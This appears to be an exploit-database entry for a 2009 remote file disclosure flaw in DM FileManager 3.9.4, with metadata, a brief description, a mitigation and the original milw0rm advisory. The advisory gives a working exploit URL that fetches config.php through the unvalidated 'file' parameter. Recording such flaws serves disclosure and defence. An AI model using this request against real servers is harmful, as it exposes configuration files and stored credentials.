header-logo
Suggest Exploit
vendor:
DM FileManager
by:
Stack
7,5
CVSS
HIGH
Remote File Dislosure
434
CWE
Product Name: DM FileManager
Affected Version From: 3.9.4
Affected Version To: 3.9.4
Patch Exists: YES
Related CWE: N/A
CPE: a:dutchmonkey:dm_filemanager
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

DM FileManager 3.9.4 Remote File Dislosure Vulnerability

A vulnerability in DM FileManager 3.9.4 allows an attacker to remotely download any file from the server. This is due to the lack of proper validation of the 'file' parameter in the 'dm-albums.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable server.

Mitigation:

Upgrade to the latest version of DM FileManager.
Source

Exploit-DB raw data:

#############################################################################################
[+] DM FileManager 3.9.4 Remote File Dislosure Vulnerability
[+] Author : Stack
[+] Greetz : V4 Team & Sec R1z
[+] Download Script : http://www.dutchmonkey.com/?file=products/dm-filemanager/download_response.html&download=direct
#############################################################################################
[+] Xpl :
[+] http://[sitename]/[path]/dm-albums/dm-albums.php?download=yes&file=config.php&currdir=/dm-albums/
#############################################################################################

# milw0rm.com [2009-06-30]

Navigation

Suggest Exploit

Services By CQR